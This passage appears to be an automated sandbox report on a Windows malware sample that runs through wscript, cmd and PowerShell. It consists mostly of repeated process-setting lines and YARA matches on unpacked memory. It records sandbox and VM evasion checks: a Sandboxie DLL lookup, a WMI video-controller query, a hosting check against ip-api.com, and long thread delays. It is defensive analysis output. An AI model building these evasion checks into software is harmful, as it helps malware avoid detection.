                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\F5A6144F270696C79418 CC52384910CEE944DDBCC575A8E0177BFA6B16E3032438B207797164D5C94B34
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exe  Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\LogonUI.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\dwm.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: 5.2.powershell.exe.1d3133b65d0.8.unpack, type: UNPACKEDPE
                Source: Yara match File source: 18.2.powershell.exe.1e1aa26a4b0.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 23.2.powershell.exe.2cc0714a0b0.4.unpack, type: UNPACKEDPE
                Source: Yara match File source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 28.2.powershell.exe.20601de4450.13.unpack, type: UNPACKEDPE
                Source: Yara match File source: 28.2.powershell.exe.206008ed970.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 23.2.powershell.exe.2cc07141480.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 18.2.powershell.exe.1e1aa248728.8.unpack, type: UNPACKEDPE
                Source: Yara match File source: 23.2.powershell.exe.2cc07127e40.3.unpack, type: UNPACKEDPE
                Source: Yara match File source: 28.2.powershell.exe.206008f65a0.7.unpack, type: UNPACKEDPE
                Source: Yara match File source: 28.2.powershell.exe.20601dfa830.9.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 28.2.powershell.exe.20601dfa830.9.unpack, type: UNPACKEDPE
                Source: Yara match File source: 11.2.powershell.exe.1d7ce2d5060.3.unpack, type: UNPACKEDPE
                Source: Yara match File source: 11.2.powershell.exe.1d7ccde7168.12.unpack, type: UNPACKEDPE
                Source: Yara match File source: 28.2.powershell.exe.20601de4450.13.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 11.2.powershell.exe.1d7e4bb0000.16.unpack, type: UNPACKEDPE
                Source: Yara match File source: 11.2.powershell.exe.1d7ce2eb440.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 18.2.powershell.exe.1e1aa261880.9.unpack, type: UNPACKEDPE
                Source: Yara match File source: 28.2.powershell.exe.206008f65a0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 11.2.powershell.exe.1d7ccdde538.9.unpack, type: UNPACKEDPE
                Source: Yara match File source: 28.2.powershell.exe.206008ed970.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 18.2.powershell.exe.1e1aa248728.8.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.powershell.exe.1d3133ad9a0.3.unpack, type: UNPACKEDPE
                Source: Yara match File source: 11.2.powershell.exe.1d7ce2eb440.2.unpack, type: UNPACKEDPE
                Source: Yara match File source: 11.2.powershell.exe.1d7e4bb0000.16.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.powershell.exe.1d3133975c0.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 23.2.powershell.exe.2cc07127e40.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000001C.00000002.2323673539.00000206008C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000001C.00000002.2323673539.0000020601DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000001C.00000002.2323673539.0000020601DC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.2325412269.000001D313377000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000B.00000002.1945403188.000001D7CE2B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000B.00000002.1945403188.000001D7CE2E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000B.00000002.1969459274.000001D7E4BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000017.00000002.2248750195.000002CC070F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000B.00000002.1945403188.000001D7CCDB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000001C.00000002.2323673539.0000020601DE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 2720, type: MEMORYSTR
                Source: 5.2.powershell.exe.1d3130bafb0.5.raw.unpack, tcsnk.cs .Net Code: Main contains sample name check
                Source: 5.2.powershell.exe.1d3130b0098.1.raw.unpack, tcsnk.cs .Net Code: Main contains sample name check
                Source: 5.2.powershell.exe.1d31326fc88.4.raw.unpack, tcsnk.cs .Net Code: Main contains sample name check
                Source: 5.2.powershell.exe.1d3130da550.6.raw.unpack, tcsnk.cs .Net Code: Main contains sample name check
                Source: 5.2.powershell.exe.1d3130d3740.2.raw.unpack, tcsnk.cs .Net Code: Main contains sample name check
                Source: 11.2.powershell.exe.1d7ce1adde0.11.raw.unpack, tcsnk.cs .Net Code: Main contains sample name check
                Source: 11.2.powershell.exe.1d7cdfeefc8.0.raw.unpack, tcsnk.cs .Net Code: Main contains sample name check
                Source: 11.2.powershell.exe.1d7ce012688.10.raw.unpack, tcsnk.cs .Net Code: Main contains sample name check
                Source: 11.2.powershell.exe.1d7ce019498.1.raw.unpack, tcsnk.cs .Net Code: Main contains sample name check
                Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: powershell.exe, 00000005.00000002.2325412269.000001D312D1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2325412269.000001D3133C6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                Source: powershell.exe, 00000005.00000002.2325412269.000001D313377000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2325412269.000001D3133AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CE2B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CE2E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1969459274.000001D7E4BB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CCDB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1AA261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC070F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC07141000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLLINFO
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4251
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5594
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6875
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2895
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6559
